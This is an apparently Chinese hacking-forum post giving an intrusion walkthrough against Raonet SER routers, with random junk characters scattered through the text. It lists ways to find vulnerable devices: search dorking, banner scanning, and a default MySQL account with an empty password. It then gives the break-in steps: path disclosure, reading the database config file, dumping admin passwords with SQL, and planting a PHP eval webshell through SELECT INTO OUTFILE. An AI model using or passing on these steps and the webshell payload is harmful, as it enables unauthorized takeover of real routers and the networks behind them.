寻找存在漏洞的路由器方法:
@& J$ I e' \ W+ z: O+ }: r, {5 {, b( z9 C; F& J* \
1:google搜索'Raonet Subscriber Ethernet Router'
6 i; p0 a( q+ e- {5 @- j3 u( s6 Z- @( j5 B8 d, M5 F
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
8 {' P( h, V4 V, e
- u1 p. \# E- _$ s+ u; F/ Z3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
. ?) E- ? |3 i" v. }3 W% p; z, r6 ~1 d, |5 T6 ?" D
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. m/ s9 r; P; [# \
9 p" y: x& s7 T9 q( k# C' n 1 D4 N. Y# t7 L0 O; s2 R
0 M" Y7 l4 _& s& i. t# J# `. [
入侵步骤:$ d8 A1 H" g/ f5 G i6 p# U( G
5 I6 P' Z, G3 m0 D0 @; T- |
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php$ O( l" n9 W! u% Z
7 ]+ S7 x: ^! N7 W; `8 n) @: h8 i
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
7 i; S5 ^. t# b U2 g* ]3:得到密码后连接,查看GUI管理密码:
4 \+ S. }% r5 e, T. V0 }use ser_5008 \3 ]3 I9 I% _( p; j) d
select id,passwd from user;9 _4 G# x d# b" H! v8 i
4:通过数据库写入webshell,执行命令:" a6 }8 d7 x. ~: X
use mysql;: J8 V ?- e% t6 L3 R) l1 e" _- t; @: `
create table ok(cmd TEXT);
j7 M4 M, @# a! Q$ l( S5 zinsert into ok values("<?php @eval($_POST[cmd])?>");
/ K' ~8 s) Z/ T3 F* `( xselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";# T; Q+ {7 K ]: L
drop table ok;
2 A# W& y j% B8 }- Z/ A# k& c6 @+ g+ |+ g1 t% Y! X
5:连接后门shell.php
$ k1 V( ^, t0 v; ~6 d% g7 i( P8 F* ?1 }; o4 p
6. 搞定!' z; s |% r' V7 X5 Y9 {' E
8 G5 E8 G5 b7 \& d- P% T
|
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50